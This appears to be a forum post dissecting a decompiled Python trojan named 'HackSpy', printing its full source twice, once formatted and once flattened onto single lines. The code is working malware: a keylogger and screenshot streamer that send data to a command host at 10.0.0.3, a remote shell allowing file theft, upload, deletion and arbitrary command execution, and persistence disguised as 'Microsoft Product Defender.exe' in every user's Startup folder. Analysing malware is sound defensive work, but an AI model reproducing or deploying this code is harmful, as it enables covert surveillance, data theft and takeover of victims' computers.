---removed---
0025B28C 00 00 00 00 28 00 00 00 00 73 5B 00 00 00 43 3A ••••(••••s[•••C: 0025B29C 5C 55 73 65 72 73 5C 44 61 6D 69 61 6E 5C 44 65 \Users\Damian\De 0025B2AC 73 6B 74 6F 70 5C 48 61 63 6B 53 70 79 20 54 72 sktop\HackSpy Tr 0025B2BC 6F 6A 61 6E 20 45 78 70 6C 6F 69 74 5C 64 61 74 ojan Exploit\dat 0025B2CC 61 5C 6C 69 62 5C 73 69 74 65 2D 70 61 63 6B 61 a\lib\site-packa 0025B2DC 67 65 73 5C 70 79 32 65 78 65 5C 62 6F 6F 74 5F ges\py2exe\boot_ 0025B2EC 63 6F 6D 6D 6F 6E 2E 70 79 52 0A 00 00 00 32 00 common.pyR••••2•
# Embedded file name: C:\Users\Damian\Desktop\HackSpy Trojan Exploit\data\lib\site-packages\py2exe\boot_common.py
import sys
if sys.frozen == 'windows_exe':
class Stderr(object):
softspace = 0
_file = None
_error = None
def write(self, text, alert = sys._MessageBox, fname = sys.executable + '.log'):
if self._file is None and self._error is None:
try:
self._file = open(fname, 'a')
except Exception as details:
self._error = details
import atexit
atexit.register(alert, 0, "The logfile '%s' could not be opened:\n %s" % (fname, details), 'Errors occurred')
else:
import atexit
atexit.register(alert, 0, "See the logfile '%s' for details" % fname, 'Errors occurred')
if self._file is not None:
self._file.write(text)
self._file.flush()
return
def flush(self):
if self._file is not None:
self._file.flush()
return
sys.stderr = Stderr()
del sys._MessageBox
del Stderr
class Blackhole(object):
softspace = 0
def write(self, text):
pass
def flush(self):
pass
sys.stdout = Blackhole()
del Blackhole
del sys
import linecache
def fake_getline(filename, lineno, module_globals = None):
return ''
linecache.orig_getline = linecache.getline
linecache.getline = fake_getline
del linecache
del fake_getline
# Embedded file name: seq_data.py
ip = '10.0.0.3'
import pyHook, pythoncom, sys, logging
import socket
from threading import Thread
from time import sleep
import autopy
import os
import shutil
import inspect
import atexit
import multiprocessing
from multiprocessing import forking
try:
sys.stderr = open('D:\\my_stderr.log', 'w')
except:
pass
class _Popen(forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
os.putenv('_MEIPASS2', sys._MEIPASS)
try:
super(_Popen, self).__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
os.unsetenv('_MEIPASS2')
class Process(multiprocessing.Process):
_Popen = _Popen
def if_startup():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loop = 'on'
while loop == 'on':
try:
sleep(1)
server.connect((ip, 8081))
loop = 'off'
except:
pass
def back_dir(current_path):
c = current_path.split('\\')
new_path = ''
i = 0
while i < len(c) - 1:
if i != 0:
new_path = new_path + '\\' + c[i]
else:
new_path = c[i]
i += 1
os.chdir(new_path)
def attack1():
server1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loop1 = 'on'
while loop1 == 'on':
try:
sleep(1)
server1.connect((ip, 10000))
loop1 = 'off'
except:
pass
def OnKeyboardEvent(event):
k = chr(event.Ascii)
server1.send(k)
return None
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
def attack2():
server3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loop3 = 'on'
while loop3 == 'on':
try:
sleep(1)
server3.connect((ip, 4444))
loop3 = 'off'
except:
pass
time_interval = 3
try:
time_interval = server3.recv(1024)
except:
pass
while True:
sleep(float(time_interval))
bitmap = autopy.bitmap.capture_screen()
bitmap.save('1.png')
with open('1.png', 'rb') as f:
bytes_to_send = f.read(1024)
server3.send(bytes_to_send)
while bytes_to_send != '':
bytes_to_send = f.read(1024)
if bytes_to_send == '':
server3.send('stop it')
else:
server3.send(bytes_to_send)
def attack3():
server4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loop4 = 'on'
while loop4 == 'on':
try:
sleep(1)
server4.connect((ip, 10008))
loop4 = 'off'
except:
pass
while True:
command = server4.recv(1024)
if command == 'cd..':
try:
back_dir(os.getcwd())
except:
pass
elif command[:3] == 'cd ':
try:
os.chdir(command[3:])
except:
pass
elif command == 'ls':
data = os.listdir(os.getcwd())
i = 0
d = ''
while i < len(data):
d = d + '$$%%' + data[i]
i += 1
server4.send(d)
elif command[:4] == 'get ':
f = open(command[4:], 'rb')
size = os.path.getsize(command[4:])
server4.send(str(size))
data = f.read(2048)
server4.send(data)
while data != '':
data = ''
data = f.read(2048)
if data == '':
server4.send('stop it')
else:
server4.send(data)
elif command[:6] == 'mkdir ':
os.mkdir(command[6:])
elif command[:7] == 'upload ':
size = server4.recv(1024)
data = server4.recv(2048)
while data[-7:] != 'stop it':
f = open(command[7:], 'ab')
f.write(data)
f.close()
data = ''
data = server4.recv(2048)
elif command == 'pwd':
path = os.getcwd()
server4.send(path)
elif command[:5] == 'del_d':
try:
os.rmtree(command[6:])
except:
pass
elif command[:5] == 'del_f':
try:
os.remove(command[6:])
except:
pass
elif command == 'shutdown':
os.system('shutdown -s')
elif command[:4] == 'cmd ':
try:
print command[4:]
os.system(command[4:])
except:
pass
count = 0
server2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server6 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
if count == 1:
loop0 = 'on'
while loop0 == 'on':
try:
sleep(1)
server2.connect((ip, 8081))
option = server2.recv(1024)
loop0 = 'off'
except:
pass
count = 2
elif count == 0:
option = server.recv(1024)
count = 1
elif count == 2:
loop6 = 'on'
while loop6 == 'on':
try:
print 'done'
sleep(1)
server6.connect((ip, 8081))
option = server6.recv(1024)
loop6 = 'off'
except:
pass
count = 1
if option == '1':
t = Thread(target=attack1)
t.start()
elif option == '2':
t = Thread(target=attack2)
t.start()
elif option == '3':
t = Thread(target=attack3)
t.start()
if os.getcwd()[-7:] == 'Startup':
atexit.register(if_startup)
else:
try:
s = os.getcwd()
fi = inspect.stack()[0][1]
present_file = fi.split('/')
source = str(s) + '\\' + present_file[-1][:-2] + 'exe'
dest = 'Microsoft Product Defender.exe'
os.chdir('C:\\Users')
hostlist = os.listdir('.')
for i in hostlist:
try:
os.chdir('C:\\Users\\' + str(i) + '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup')
shutil.copy2(source, dest)
f = open('windows.bat', 'w')
f.write('@echo off\n')
f.write('"Microsoft Product Defender.exe"')
f.close()
except:
pass
except:
pass
atexit.register(if_startup)
Thank youQuote:
u sure bro?Code:0025B28C 00 00 00 00 28 00 00 00 00 73 5B 00 00 00 43 3A ••••(••••s[•••C: 0025B29C 5C 55 73 65 72 73 5C 44 61 6D 69 61 6E 5C 44 65 \Users\Damian\De 0025B2AC 73 6B 74 6F 70 5C 48 61 63 6B 53 70 79 20 54 72 sktop\HackSpy Tr 0025B2BC 6F 6A 61 6E 20 45 78 70 6C 6F 69 74 5C 64 61 74 ojan Exploit\dat 0025B2CC 61 5C 6C 69 62 5C 73 69 74 65 2D 70 61 63 6B 61 a\lib\site-packa 0025B2DC 67 65 73 5C 70 79 32 65 78 65 5C 62 6F 6F 74 5F ges\py2exe\boot_ 0025B2EC 63 6F 6D 6D 6F 6E 2E 70 79 52 0A 00 00 00 32 00 common.pyR••••2•
Edit: Next level
boot_common.py
seq_data.py:Code:# Embedded file name: C:\Users\Damian\Desktop\HackSpy Trojan Exploit\data\lib\site-packages\py2exe\boot_common.py import sys if sys.frozen == 'windows_exe': class Stderr(object): softspace = 0 _file = None _error = None def write(self, text, alert = sys._MessageBox, fname = sys.executable + '.log'): if self._file is None and self._error is None: try: self._file = open(fname, 'a') except Exception as details: self._error = details import atexit atexit.register(alert, 0, "The logfile '%s' could not be opened:\n %s" % (fname, details), 'Errors occurred') else: import atexit atexit.register(alert, 0, "See the logfile '%s' for details" % fname, 'Errors occurred') if self._file is not None: self._file.write(text) self._file.flush() return def flush(self): if self._file is not None: self._file.flush() return sys.stderr = Stderr() del sys._MessageBox del Stderr class Blackhole(object): softspace = 0 def write(self, text): pass def flush(self): pass sys.stdout = Blackhole() del Blackhole del sys import linecache def fake_getline(filename, lineno, module_globals = None): return '' linecache.orig_getline = linecache.getline linecache.getline = fake_getline del linecache del fake_getline
Wooaaah. It has some screen capture things. Think i gotta stream some *weird* "things".Code:# Embedded file name: seq_data.py ip = '10.0.0.3' import pyHook, pythoncom, sys, logging import socket from threading import Thread from time import sleep import autopy import os import shutil import inspect import atexit import multiprocessing from multiprocessing import forking try: sys.stderr = open('D:\\my_stderr.log', 'w') except: pass class _Popen(forking.Popen): def __init__(self, *args, **kw): if hasattr(sys, 'frozen'): os.putenv('_MEIPASS2', sys._MEIPASS) try: super(_Popen, self).__init__(*args, **kw) finally: if hasattr(sys, 'frozen'): os.unsetenv('_MEIPASS2') class Process(multiprocessing.Process): _Popen = _Popen def if_startup(): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) loop = 'on' while loop == 'on': try: sleep(1) server.connect((ip, 8081)) loop = 'off' except: pass def back_dir(current_path): c = current_path.split('\\') new_path = '' i = 0 while i < len(c) - 1: if i != 0: new_path = new_path + '\\' + c[i] else: new_path = c[i] i += 1 os.chdir(new_path) def attack1(): server1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) loop1 = 'on' while loop1 == 'on': try: sleep(1) server1.connect((ip, 10000)) loop1 = 'off' except: pass def OnKeyboardEvent(event): k = chr(event.Ascii) server1.send(k) return None hooks_manager = pyHook.HookManager() hooks_manager.KeyDown = OnKeyboardEvent hooks_manager.HookKeyboard() pythoncom.PumpMessages() def attack2(): server3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) loop3 = 'on' while loop3 == 'on': try: sleep(1) server3.connect((ip, 4444)) loop3 = 'off' except: pass time_interval = 3 try: time_interval = server3.recv(1024) except: pass while True: sleep(float(time_interval)) bitmap = autopy.bitmap.capture_screen() bitmap.save('1.png') with open('1.png', 'rb') as f: bytes_to_send = f.read(1024) server3.send(bytes_to_send) while bytes_to_send != '': bytes_to_send = f.read(1024) if bytes_to_send == '': server3.send('stop it') else: server3.send(bytes_to_send) def attack3(): server4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) loop4 = 'on' while loop4 == 'on': try: sleep(1) server4.connect((ip, 10008)) loop4 = 'off' except: pass while True: command = server4.recv(1024) if command == 'cd..': try: back_dir(os.getcwd()) except: pass elif command[:3] == 'cd ': try: os.chdir(command[3:]) except: pass elif command == 'ls': data = os.listdir(os.getcwd()) i = 0 d = '' while i < len(data): d = d + '$$%%' + data[i] i += 1 server4.send(d) elif command[:4] == 'get ': f = open(command[4:], 'rb') size = os.path.getsize(command[4:]) server4.send(str(size)) data = f.read(2048) server4.send(data) while data != '': data = '' data = f.read(2048) if data == '': server4.send('stop it') else: server4.send(data) elif command[:6] == 'mkdir ': os.mkdir(command[6:]) elif command[:7] == 'upload ': size = server4.recv(1024) data = server4.recv(2048) while data[-7:] != 'stop it': f = open(command[7:], 'ab') f.write(data) f.close() data = '' data = server4.recv(2048) elif command == 'pwd': path = os.getcwd() server4.send(path) elif command[:5] == 'del_d': try: os.rmtree(command[6:]) except: pass elif command[:5] == 'del_f': try: os.remove(command[6:]) except: pass elif command == 'shutdown': os.system('shutdown -s') elif command[:4] == 'cmd ': try: print command[4:] os.system(command[4:]) except: pass count = 0 server2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server6 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) while True: if count == 1: loop0 = 'on' while loop0 == 'on': try: sleep(1) server2.connect((ip, 8081)) option = server2.recv(1024) loop0 = 'off' except: pass count = 2 elif count == 0: option = server.recv(1024) count = 1 elif count == 2: loop6 = 'on' while loop6 == 'on': try: print 'done' sleep(1) server6.connect((ip, 8081)) option = server6.recv(1024) loop6 = 'off' except: pass count = 1 if option == '1': t = Thread(target=attack1) t.start() elif option == '2': t = Thread(target=attack2) t.start() elif option == '3': t = Thread(target=attack3) t.start() if os.getcwd()[-7:] == 'Startup': atexit.register(if_startup) else: try: s = os.getcwd() fi = inspect.stack()[0][1] present_file = fi.split('/') source = str(s) + '\\' + present_file[-1][:-2] + 'exe' dest = 'Microsoft Product Defender.exe' os.chdir('C:\\Users') hostlist = os.listdir('.') for i in hostlist: try: os.chdir('C:\\Users\\' + str(i) + '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup') shutil.copy2(source, dest) f = open('windows.bat', 'w') f.write('@echo off\n') f.write('"Microsoft Product Defender.exe"') f.close() except: pass except: pass atexit.register(if_startup)
Edit 2: IP is 10.0.0.3. I thought that hamachi was a troll but the "hacker" is definitily too stupid to make a port forwarding :D:D:D